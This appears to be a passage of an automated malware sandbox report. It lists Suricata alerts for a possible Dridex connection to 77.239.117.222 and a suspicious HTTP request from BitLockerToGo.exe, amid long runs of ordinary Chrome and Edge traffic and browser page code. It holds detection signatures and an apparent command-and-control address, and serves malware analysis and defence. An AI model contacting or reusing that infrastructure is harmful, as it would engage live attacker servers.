                  Source: Network traffic | Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.8:50111 -> 77.239.117.222:443
                  Source: Network traffic | Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.8:50133 -> 77.239.117.222:443
                  Source: Network traffic | Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.8:50117 -> 77.239.117.222:443
                  Source: Network traffic | Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.8:50036 -> 77.239.117.222:443
                  Source: Network traffic | Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.8:50019 -> 77.239.117.222:443
                  Source: Network traffic | Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.8:50100 -> 77.239.117.222:443
                  Source: Network traffic | Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.8:50139 -> 77.239.117.222:443
                  Source: Network traffic | Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.8:50088 -> 77.239.117.222:443
                  Source: Network traffic | Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.8:50025 -> 77.239.117.222:443
                  Source: unknownHTTPS traffic detected: 23.206.229.226:443 -> 192.168.2.8:49745 version: TLS 1.0
                  Source: unknownTCP traffic detected without corresponding DNS query: 23.206.229.226
                  Source: unknownTCP traffic detected without corresponding DNS query: 23.206.229.226
                  Source: unknownTCP traffic detected without corresponding DNS query: 52.182.143.211
                  Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
                  Source: unknownTCP traffic detected without corresponding DNS query: 23.206.229.226
                  Source: unknownTCP traffic detected without corresponding DNS query: 23.206.229.226
                  Source: unknownTCP traffic detected without corresponding DNS query: 23.206.229.226
                  Source: unknownTCP traffic detected without corresponding DNS query: 77.239.117.222
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_00403C79 InternetOpenA,StrCmpCA,InternetConnectA,HttpOpenRequestA,InternetSetOptionA,HttpSendRequestA,HttpQueryInfoA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,3_2_00403C79
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 77.239.117.222Connection: Keep-AliveCache-Control: no-cache
                  Source: global trafficHTTP traffic detected: GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CIW2yQEIorbJAQipncoBCOj/ygEIlKHLAQiFoM0BCNy9zQEIkMrNAQi5ys0BCIrTzQEIx9TNAQih1s0BCKjYzQEI+cDUFRjBy8wBGLrSzQEYxdjNARjrjaUXSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
                  Source: global trafficHTTP traffic detected: GET /async/newtab_ogb?hl=en-US&async=fixed:0 HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CIW2yQEIorbJAQipncoBCOj/ygEIlKHLAQiFoM0BCNy9zQEIkMrNAQi5ys0BCIrTzQEIx9TNAQih1s0BCKjYzQEI+cDUFRjBy8wBGLrSzQEYxdjNARjrjaUXSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
                  Source: global trafficHTTP traffic detected: GET /async/newtab_promos HTTP/1.1Host: www.google.comConnection: keep-aliveSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
                  Source: global trafficHTTP traffic detected: GET /edge/ntp?locale=en-GB&title=New%20tab&dsp=1&sp=Bing&isFREModalBackground=1&startpage=1&PC=U531 HTTP/1.1Host: ntp.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"sec-ch-ua-platform-version: "10.0.0"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7sec-edge-ntp: {"back_block":0,"bg_cur":{},"bg_img_typ":"bing","exp":["msQuickLinksDefaultOneRow","msShoppingWebAssistOnNtp","msShoppingHistogramsOnNtp","msEnableWinHPNewTabBackButtonFocusAndClose","msCustomMaxQuickLinks","msMaxQuickLinksAt20","msAllowThemeInstallationFromChromeStore","msEdgeSplitWindowPrivateTarget","msEdgeSplitWindowLinkMode"],"feed":0,"feed_dis":"onscroll","layout":1,"quick_links_opt":1,"sel_feed_piv":"","show_greet":true,"vt_opened":false}Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
                  Source: global trafficHTTP traffic detected: GET /bundles/v1/edgeChromium/latest/SSR-extension.ed97448f67caacb1a1dd.js HTTP/1.1Host: ntp.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://ntp.msn.comsec-ch-viewport-height: 876sec-ch-ua-arch: "x86"sec-ch-viewport-width: 1232sec-ch-ua-platform-version: "10.0.0"downlink: 1.45sec-ch-ua-full-version-list: "Microsoft Edge";v="117.0.2045.47", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-prefers-color-scheme: lightsec-ch-ua-platform: "Windows"device-memory: 8rtt: 100sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-full-version: "117.0.2045.47"sec-ch-dpr: 1ect: 4gAccept: */*sec-edge-ntp: {"back_block":0,"bg_cur":{},"bg_img_typ":"bing","exp":["msQuickLinksDefaultOneRow","msShoppingWebAssistOnNtp","msShoppingHistogramsOnNtp","msEnableWinHPNewTabBackButtonFocusAndClose","msCustomMaxQuickLinks","msMaxQuickLinksAt20","msAllowThemeInstallationFromChromeStore","msEdgeSplitWindowPrivateTarget","msEdgeSplitWindowLinkMode"],"feed":0,"feed_dis":"onscroll","layout":1,"quick_links_opt":1,"sel_feed_piv":"","show_greet":true,"vt_opened":false}Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://ntp.msn.com/edge/ntp?locale=en-GB&title=New%20tab&dsp=1&sp=Bing&isFREModalBackground=1&startpage=1&PC=U531Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: _C_ETH=1; sptmarket=en-GB||us|en-us|en-us|en||cf=8|RefA=D69EC62D4A9F4EF7A7C5DBF11DD10DB6.RefC=2025-02-13T12:14:31Z; USRLOC=; MUID=2719AE970809620B08BEBB0509A16321; MUIDB=2719AE970809620B08BEBB0509A16321; _EDGE_S=F=1&SID=18407F394CCD6B571F326AAB4D786A95; _EDGE_V=1
                  Source: global trafficHTTP traffic detected: GET /bundles/v1/edgeChromium/latest/web-worker.96ac23719317b1928681.js HTTP/1.1Host: ntp.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-viewport-height: 876sec-ch-ua-arch: "x86"sec-ch-viewport-width: 1232sec-ch-ua-platform-version: "10.0.0"downlink: 1.45sec-ch-ua-bitness: "64"sec-ch-ua-full-version-list: "Microsoft Edge";v="117.0.2045.47", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"sec-ch-ua-model: ""sec-ch-prefers-color-scheme: lightsec-ch-ua-platform: "Windows"device-memory: 8rtt: 100sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-full-version: "117.0.2045.47"sec-ch-dpr: 1ect: 4gAccept: */*sec-edge-ntp: {"back_block":0,"bg_cur":{},"bg_img_typ":"bing","exp":["msQuickLinksDefaultOneRow","msShoppingWebAssistOnNtp","msShoppingHistogramsOnNtp","msEnableWinHPNewTabBackButtonFocusAndClose","msCustomMaxQuickLinks","msMaxQuickLinksAt20","msAllowThemeInstallationFromChromeStore","msEdgeSplitWindowPrivateTarget","msEdgeSplitWindowLinkMode"],"feed":0,"feed_dis":"onscroll","layout":1,"quick_links_opt":1,"sel_feed_piv":"","show_greet":true,"vt_opened":false}Sec-Fetch-Site: same-originSec-Fetch-Mode: same-originSec-Fetch-Dest: workerReferer: https://ntp.msn.com/edge/ntp?locale=en-GB&title=New%20tab&dsp=1&sp=Bing&isFREModalBackground=1&startpage=1&PC=U531Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: _C_ETH=1; sptmarket=en-GB||us|en-us|en-us|en||cf=8|RefA=D69EC62D4A9F4EF7A7C5DBF11DD10DB6.RefC=2025-02-13T12:14:31Z; USRLOC=; MUID=2719AE970809620B08BEBB0509A16321; MUIDB=2719AE970809620B08BEBB0509A16321; _EDGE_S=F=1&SID=18407F394CCD6B571F326AAB4D786A95; _EDGE_V=1
                  Source: global trafficHTTP traffic detected: GET /bundles/v1/edgeChromium/latest/vendors.f30eb488fb3069c7561f.js HTTP/1.1Host: assets.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://ntp.msn.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
                  Source: global trafficHTTP traffic detected: GET /crx/blobs/ASuc5ohfQPNzGo5SSihcSk6msC8CUKw5id-p0KCEkBKwK2LS4AjdrDP0wa1qjzCTaTWEfyM52ADmUAdPETYA5vgD87UPEj6gyG11hjsvMLHGmzQgJ9F5D8s8Lo0Lbai5BQYAxlKa5esPJXukyaicyq83JwZ0HIWqzrjN/GHBMNNJOOEKPMOECNNNILNNBDLOLHKHI_1_86_1_0.crx HTTP/1.1Host: clients2.googleusercontent.comConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
                  Source: global trafficHTTP traffic detected: GET /bundles/v1/edgeChromium/latest/microsoft.5da1d823f3d7131a6bff.js HTTP/1.1Host: assets.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://ntp.msn.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
                  Source: global trafficHTTP traffic detected: GET /bundles/v1/edgeChromium/latest/common.7cbcca50273230cade4d.js HTTP/1.1Host: assets.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://ntp.msn.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
                  Source: global trafficHTTP traffic detected: GET /bundles/v1/edgeChromium/latest/experience.a665aac5e1c351cb0ec3.js HTTP/1.1Host: assets.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://ntp.msn.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
                  Source: global trafficHTTP traffic detected: GET /b?rn=1739448876435&c1=2&c2=3000001&cs_ucfr=1&c7=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2Btab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp%26mkt%3Den-us&c8=New+tab&c9=&cs_fpid=2719AE970809620B08BEBB0509A16321&cs_fpit=o&cs_fpdm=*null&cs_fpdt=*null HTTP/1.1Host: sb.scorecardresearch.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
                  Source: global trafficHTTP traffic detected: GET /c.gif?rnd=1739448876435&udc=true&pg.n=default&pg.t=dhp&pg.c=547&pg.p=anaheim&rf=&tp=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2520tab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp&cvs=Browser&di=340&st.dpt=&st.sdpt=antp&subcvs=homepage&lng=en-us&rid=d69ec62d4a9f4ef7a7c5dbf11dd10db6&activityId=d69ec62d4a9f4ef7a7c5dbf11dd10db6&d.imd=false&scr=1280x1024&anoncknm=app_anon&issso=&aadState=0 HTTP/1.1Host: c.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: _C_ETH=1; USRLOC=; MUID=2719AE970809620B08BEBB0509A16321; _EDGE_S=F=1&SID=18407F394CCD6B571F326AAB4D786A95; _EDGE_V=1
                  Source: global trafficHTTP traffic detected: GET /edge/ntp/service-worker.js?bundles=latest&riverAgeMinutes=2880&navAgeMinutes=2880&networkTimeoutSeconds=5&bgTaskNetworkTimeoutSeconds=8&ssrBasePageNavAgeMinutes=360&enableEmptySectionRoute=true&enableNavPreload=true&enableFallbackVerticalsFeed=true&noCacheLayoutTemplates=true&cacheSSRBasePageResponse=true&enableStaticAdsRouting=true&enableWidgetsRegion=true HTTP/1.1Host: ntp.msn.comConnection: keep-aliveCache-Control: max-age=0Accept: */*Service-Worker: scriptUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-edge-ntp: {"back_block":0,"bg_cur":{"configIndex":40,"imageId":"BB1msG0Z","provider":"CMSImage","userSelected":false},"bg_img_typ":"bing","exp":["msQuickLinksDefaultOneRow","msShoppingWebAssistOnNtp","msShoppingHistogramsOnNtp","msEnableWinHPNewTabBackButtonFocusAndClose","msCustomMaxQuickLinks","msMaxQuickLinksAt20","msAllowThemeInstallationFromChromeStore","msEdgeSplitWindowPrivateTarget","msEdgeSplitWindowLinkMode"],"feed":0,"feed_dis":"onscroll","layout":1,"quick_links_opt":1,"sel_feed_piv":"myFeed","show_greet":true,"vt_opened":false,"wpo_nx":{"v":"2","wgt":{"src":"default"}}}Sec-Fetch-Site: same-originSec-Fetch-Mode: same-originSec-Fetch-Dest: serviceworkerReferer: https://ntp.msn.com/edge/ntp?locale=en-GB&title=New%20tab&dsp=1&sp=Bing&isFREModalBackground=1&startpage=1&PC=U531Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: _C_Auth=; pglt-edgeChromium-dhp=547; sptmarket=en-GB||us|en-us|en-us|en||cf=8|RefA=D69EC62D4A9F4EF7A7C5DBF11DD10DB6.RefC=2025-02-13T12:14:31Z; USRLOC=; MUID=2719AE970809620B08BEBB0509A16321; MUIDB=2719AE970809620B08BEBB0509A16321; _EDGE_S=F=1&SID=18407F394CCD6B571F326AAB4D786A95; _EDGE_V=1; MicrosoftApplicationsTelemetryDeviceId=394cf2e4-e8a3-4bcf-a9da-86a43c010199; ai_session=l7I5qVhDsExpipSAvgy4+q|1739448876424|1739448876424; sptmarket_restored=en-GB||us|en-us|en-us|en||cf=8|RefA=D69EC62D4A9F4EF7A7C5DBF11DD10DB6.RefC=2025-02-13T12:14:31Z
                  Source: global trafficHTTP traffic detected: GET /edge/ntp?locale=en-GB&title=New+tab&enableForceCache=true HTTP/1.1Host: ntp.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-viewport-height: 876sec-ch-ua-arch: "x86"sec-ch-viewport-width: 1232sec-ch-ua-platform-version: "10.0.0"downlink: 10sec-ch-ua-bitness: "64"sec-ch-ua-full-version-list: "Microsoft Edge";v="117.0.2045.47", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"sec-ch-ua-model: ""sec-ch-prefers-color-scheme: lightsec-ch-ua-platform: "Windows"device-memory: 8rtt: 200sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-full-version: "117.0.2045.47"sec-ch-dpr: 1ect: 4gAccept: */*sec-edge-ntp: {"back_block":0,"bg_cur":{},"bg_img_typ":"bing","exp":["msQuickLinksDefaultOneRow","msShoppingWebAssistOnNtp","msShoppingHistogramsOnNtp","msEnableWinHPNewTabBackButtonFocusAndClose","msCustomMaxQuickLinks","msMaxQuickLinksAt20","msAllowThemeInstallationFromChromeStore","msEdgeSplitWindowPrivateTarget","msEdgeSplitWindowLinkMode"],"feed":0,"feed_dis":"onscroll","layout":1,"quick_links_opt":1,"sel_feed_piv":"","show_greet":true,"vt_opened":false}Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://ntp.msn.com/edge/ntp?locale=en-GB&title=New%20tab&dsp=1&sp=Bing&isFREModalBackground=1&startpage=1&PC=U531Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: _C_Auth=; pglt-edgeChromium-dhp=547; sptmarket=en-GB||us|en-us|en-us|en||cf=8|RefA=D69EC62D4A9F4EF7A7C5DBF11DD10DB6.RefC=2025-02-13T12:14:31Z; USRLOC=; MUID=2719AE970809620B08BEBB0509A16321; MUIDB=2719AE970809620B08BEBB0509A16321; _EDGE_S=F=1&SID=18407F394CCD6B571F326AAB4D786A95; _EDGE_V=1; MicrosoftApplicationsTelemetryDeviceId=394cf2e4-e8a3-4bcf-a9da-86a43c010199; ai_session=l7I5qVhDsExpipSAvgy4+q|1739448876424|1739448876424; sptmarket_restored=en-GB||us|en-us|en-us|en||cf=8|RefA=D69EC62D4A9F4EF7A7C5DBF11DD10DB6.RefC=2025-02-13T12:14:31Z
                  Source: global trafficHTTP traffic detected: GET /b2?rn=1739448876435&c1=2&c2=3000001&cs_ucfr=1&c7=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2Btab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp%26mkt%3Den-us&c8=New+tab&c9=&cs_fpid=2719AE970809620B08BEBB0509A16321&cs_fpit=o&cs_fpdm=*null&cs_fpdt=*null HTTP/1.1Host: sb.scorecardresearch.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: UID=1B7d7f5dcbc37b60cc63e471739448878; XID=1B7d7f5dcbc37b60cc63e471739448878
                  Source: global trafficHTTP traffic detected: GET /c.gif?rnd=1739448876435&udc=true&pg.n=default&pg.t=dhp&pg.c=547&pg.p=anaheim&rf=&tp=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2520tab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp&cvs=Browser&di=340&st.dpt=&st.sdpt=antp&subcvs=homepage&lng=en-us&rid=d69ec62d4a9f4ef7a7c5dbf11dd10db6&activityId=d69ec62d4a9f4ef7a7c5dbf11dd10db6&d.imd=false&scr=1280x1024&anoncknm=app_anon&issso=&aadState=0&ctsa=mr&CtsSyncId=32A3978F1BE342E1A43367B19C5F5B76&MUID=2719AE970809620B08BEBB0509A16321 HTTP/1.1Host: c.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: USRLOC=; MUID=2719AE970809620B08BEBB0509A16321; _EDGE_S=F=1&SID=18407F394CCD6B571F326AAB4D786A95; _EDGE_V=1; SM=T; msnup=%7B%22cnex%22%3A%22no%22%7D
                  Source: dc3200b3-06f9-4cab-9213-27944202d12e.tmp.12.drString found in binary or memory: "url": "https://www.youtube.com" equals www.youtube.com (Youtube)
                  Source: chrome.exe, 00000007.00000003.2005855727.00005AF000CF4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: %https://www.youtube.com/?feature=ytca equals www.youtube.com (Youtube)
                  Source: chrome.exe, 00000007.00000003.2005855727.00005AF000CF4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: @https://www.youtube.com/s/notifications/manifest/cr_install.html equals www.youtube.com (Youtube)
                  Source: chrome.exe, 00000007.00000003.1973895323.00005AF000FD4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.1973978198.00005AF00040C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.1973831800.00005AF00102C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: const FACEBOOK_APP_ID=738026486351791;class DoodleShareDialogElement extends PolymerElement{static get is(){return"ntp-doodle-share-dialog"}static get template(){return getTemplate$3()}static get properties(){return{title:String,url:Object}}onFacebookClick_(){const url="https://www.facebook.com/dialog/share"+`?app_id=${FACEBOOK_APP_ID}`+`&href=${encodeURIComponent(this.url.url)}`+`&hashtag=${encodeURIComponent("#GoogleDoodle")}`;WindowProxy.getInstance().open(url);this.notifyShare_(DoodleShareChannel.kFacebook)}onTwitterClick_(){const url="https://twitter.com/intent/tweet"+`?text=${encodeURIComponent(`${this.title}\n${this.url.url}`)}`;WindowProxy.getInstance().open(url);this.notifyShare_(DoodleShareChannel.kTwitter)}onEmailClick_(){const url=`mailto:?subject=${encodeURIComponent(this.title)}`+`&body=${encodeURIComponent(this.url.url)}`;WindowProxy.getInstance().navigate(url);this.notifyShare_(DoodleShareChannel.kEmail)}onCopyClick_(){this.$.url.select();navigator.clipboard.writeText(this.url.url);this.notifyShare_(DoodleShareChannel.kLinkCopy)}onCloseClick_(){this.$.dialog.close()}notifyShare_(channel){this.dispatchEvent(new CustomEvent("share",{detail:channel}))}}customElements.define(DoodleShareDialogElement.is,DoodleShareDialogElement);function getTemplate$2(){return html`<!--_html_template_start_--><style include="cr-hidden-style">:host{--ntp-logo-height:200px;display:flex;flex-direction:column;flex-shrink:0;justify-content:flex-end;min-height:var(--ntp-logo-height)}:host([reduced-logo-space-enabled_]){--ntp-logo-height:168px}:host([doodle-boxed_]){justify-content:flex-end}#logo{forced-color-adjust:none;height:92px;width:272px}:host([single-colored]) #logo{-webkit-mask-image:url(icons/google_logo.svg);-webkit-mask-repeat:no-repeat;-webkit-mask-size:100%;background-color:var(--ntp-logo-color)}:host(:not([single-colored])) #logo{background-image:url(icons/google_logo.svg)}#imageDoodle{cursor:pointer;outline:0}#imageDoodle[tabindex='-1']{cursor:auto}:host([doodle-boxed_]) #imageDoodle{background-color:var(--ntp-logo-box-color);border-radius:20px;padding:16px 24px}:host-context(.focus-outline-visible) #imageDoodle:focus{box-shadow:0 0 0 2px rgba(var(--google-blue-600-rgb),.4)}#imageContainer{display:flex;height:fit-content;position:relative;width:fit-content}#image{max-height:var(--ntp-logo-height);max-width:100%}:host([doodle-boxed_]) #image{max-height:160px}:host([doodle-boxed_][reduced-logo-space-enabled_]) #image{max-height:128px}#animation{height:100%;pointer-events:none;position:absolute;width:100%}#shareButton{background-color:var(--ntp-logo-share-button-background-color,none);border:none;height:var(--ntp-logo-share-button-height,0);left:var(--ntp-logo-share-button-x,0);min-width:var(--ntp-logo-share-button-width,0);opacity:.8;outline:initial;padding:2px;position:absolute;top:var(--ntp-logo-share-button-y,0);width:var(--ntp-logo-share-button-width,0)}#shareButton:hover{opacity:1}#shareButton img{height:100%;width:100%}#iframe{border:none;
                  Source: chrome.exe, 00000007.00000003.2005855727.00005AF000CF4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/: equals www.youtube.com (Youtube)
                  Source: chrome.exe, 00000007.00000003.2005855727.00005AF000CF4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/J equals www.youtube.com (Youtube)
                  Source: global trafficDNS traffic detected: DNS query: www.google.com
                  Source: global trafficDNS traffic detected: DNS query: apis.google.com
                  Source: global trafficDNS traffic detected: DNS query: play.google.com
